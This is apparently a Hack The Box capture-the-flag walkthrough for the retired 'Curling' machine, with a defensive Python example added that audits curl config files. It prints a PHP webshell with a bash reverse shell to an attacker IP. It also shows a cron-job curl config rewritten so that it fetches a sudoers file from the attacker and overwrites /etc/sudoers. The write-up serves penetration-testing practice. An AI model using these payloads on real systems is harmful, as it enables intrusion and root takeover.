HTB Walkthrough: Curling (retired)

Shraddha M.
4 min read · Feb 9, 2021

Curling is a retired box on HTB.

Hostname: Curling | Difficulty Level: Easy | Operating System: Linux

NMAP scan

Nmap Scan

We can see port 22 and 80 open.

HTTP Enumeration

Browsing to ‘http://10.10.10.150’ reveals a ‘Cewl’ curling site. The author of the website is ‘Super User’. The name probably hints at using cewl to generate a wordlist for brute forcing. The page source reveals that the site runs on Joomla.

Source code also hints at ‘secret.txt’ being present.

Browsing to ‘http://10.10.10.150/secret.txt’ reveals: Q3VybGluZzIwMTgh

Decoding the above with an online base64 decoder reveals a possible password.

Base64 decoded string from ‘secret.txt’

One of the posts on ‘http://10.10.10.150’ ends with ‘-Floris’ as a signature, so the username is probably ‘floris’. Logging into ‘http://10.10.10.150’ with floris/<base64 decoded password> gives you the Super User login. Browsing around did not reveal much more.

After running gobuster, browse to ‘http://10.10.10.150/administrator’ and log in with the same floris/<password> credentials.

Gobuster output

Whenever there is Joomla, try to edit the template. Go to ‘Extensions > Templates > Templates’. There will be two templates; select the one starting with ‘protostar’, as we already know its storage path (/templates/protostar) from the page source of ‘http://10.10.10.150’.

Exploitation

Create a new PHP file ‘shell.php’ in the protostar template area with the contents below:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<kali ip>/9876 0>&1'"); ?>

Listen on port 9876 with netcat (on Kali), browse to ‘10.10.10.150/templates/protostar/shell.php’, and you will get a reverse shell.

www-data@curling:/home/floris$ ls -lrt
ls -lrt
total 12
-rw-r----- 1 floris floris   33 May 22  2018 user.txt
drwxr-x--- 2 root   floris 4096 May 22  2018 admin-area
-rw-r--r-- 1 floris floris 1076 May 22  2018 password_backup

The ‘password_backup’ file contains a hex dump.

Privilege Escalation

Below are the steps to convert the file from a hex dump back to its original content:

The above can also be achieved via https://gchq.github.io/CyberChef/.

Use the obtained password to SSH into the host as user ‘floris’. This gives you the user flag. If you run ‘pspy64s’ on the system, you will see the cron jobs below repeating:

2021/02/06 20:28:01 CMD: UID=0 PID=5916 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2021/02/06 20:28:01 CMD: UID=0 PID=5915 | /usr/sbin/CRON -f
2021/02/06 20:28:01 CMD: UID=0 PID=5914 | /usr/sbin/CRON -f
2021/02/06 20:28:01 CMD: UID=0 PID=5919 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

When you run ‘man curl’, you will find the following for the ‘-K’ option:

-K, --config <file>

Specify a text file to read curl arguments from.

Basically, curl reads its arguments from the config file given after -K, one key-value pair per line. The file used by the cron job is ‘/home/floris/admin-area/input’. We will change the ‘url’ argument from localhost to the Kali machine and make sure ‘SimpleHTTPServer’ is running there, because Kali has to serve the file.

Attack methodology: we serve a file from Kali and have the cron job copy it onto the target machine at the path given by the ‘output’ attribute. The file can be anything that produces the desired outcome. For example, I am replacing the sudoers file; another option would be a crontab file that spawns a reverse root shell.

Edit ‘/home/floris/admin-area/input’ as below:

url = "http://<kali ip>:8000/sudoers"
output = "/etc/sudoers"
user-agent "Thankyou/1.0"

Note: the file ‘/home/floris/admin-area/input’ is overwritten by the cron job, so check its contents regularly.
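As an added example (not from the original walkthrough), the following Python audits a curl -K config file the way a defender reviewing this cron job would: it parses the key-value syntax described above and flags a ‘url’ that points at an untrusted host or an ‘output’ path outside the directory the job is meant to write to. The sample configs, the allowed directory and the 192.0.2.10 address are constructed for the example.

```python
"""Audit a curl -K config file consumed by a privileged cron job. Added example,
not from the original walkthrough: parses the syntax from `man curl` (one option
per line as `name = value`, `name: value` or `name value`, optional leading dashes,
double-quoted values, `#` comments) and flags settings that make root write files."""
import os
import re
from urllib.parse import urlparse

# option name, a separator ('=', ':' or whitespace), then the rest of the line; blank and '#' lines do not match
_OPTION = re.compile(r"^-{0,2}([A-Za-z][A-Za-z0-9-]*)(?:\s*[=:]\s*|\s+)?(.*)$")
_ESCAPES = {"t": "\t", "n": "\n", "r": "\r", "v": "\v"}

def _unquote(value):
    """Strip curl's double quotes and resolve its backslash escapes."""
    value = value.strip()
    if not value.startswith('"'):
        return value
    out, i = [], 1
    while i < len(value) and value[i] != '"':
        if value[i] == "\\" and i + 1 < len(value):
            i += 1
            out.append(_ESCAPES.get(value[i], value[i]))
        else:
            out.append(value[i])
        i += 1
    return "".join(out)

def parse_curl_config(text):
    """Return (option, value) pairs; value is '' for flags such as `insecure`."""
    pairs = []
    for m in (_OPTION.match(l.strip()) for l in text.splitlines()):
        if m:
            pairs.append((m.group(1).lower(), _unquote(m.group(2))))
    return pairs

def audit_curl_config(text, allowed_dir, trusted_hosts):
    """Return findings for url/output values a root-run job must not accept."""
    findings, allowed = [], os.path.normpath(allowed_dir)
    for name, value in parse_curl_config(text):
        if name == "url" and urlparse(value).hostname not in trusted_hosts:
            findings.append(f"url fetches from untrusted host {urlparse(value).hostname!r}")
        elif name in ("output", "o") and not os.path.isabs(value):
            findings.append(f"relative output {value!r}: location depends on the job's cwd")
        elif name in ("output", "o") and os.path.commonpath([allowed, os.path.normpath(value)]) != allowed:
            findings.append(f"output {value!r} lies outside {allowed}")
    return findings

# Constructed stand-ins for the job's expected config and the tampered one; 192.0.2.10 is a documentation address
EXPECTED_CONFIG = 'url = "http://127.0.0.1/"\noutput = "/home/floris/admin-area/report"\nuser-agent "Thankyou/1.0"\n'
TAMPERED_CONFIG = 'url = "http://192.0.2.10:8000/sudoers"\noutput = "/etc/sudoers"\nuser-agent "Thankyou/1.0"\n'
```

The real fix on the box is ownership: a file that root feeds to ‘curl -K’ must not be writable by the unprivileged user, which is the condition the audit assumes has already been violated.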

From the output below it is evident that floris is not in the sudoers file, so we add ‘floris’ to the sudoers file we prepare on Kali.

floris@curling:/dev/shm$ sudo root
[sudo] password for floris:
floris is not in the sudoers file. This incident will be reported.

Make a copy of the current sudoers file (on Kali) with the contents shown below, adding ‘floris’ under the root entry with ‘ALL’ privileges.

After some time you will see that the target has requested the sudoers file, as shown below:

kali@kali$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.150 - - [06/Feb/2021 16:26:34] "GET /sudoers HTTP/1.1" 200 -

Run ‘sudo su -’ to get root access and the root flag.

floris@curling:/dev/shm$ sudo su -

‘sudo su -’ means: switch to another user (su) using root privileges (sudo), authenticating with the current user’s password, and start a login shell (-). In this case the target user is root, so the login shell starts in /root.
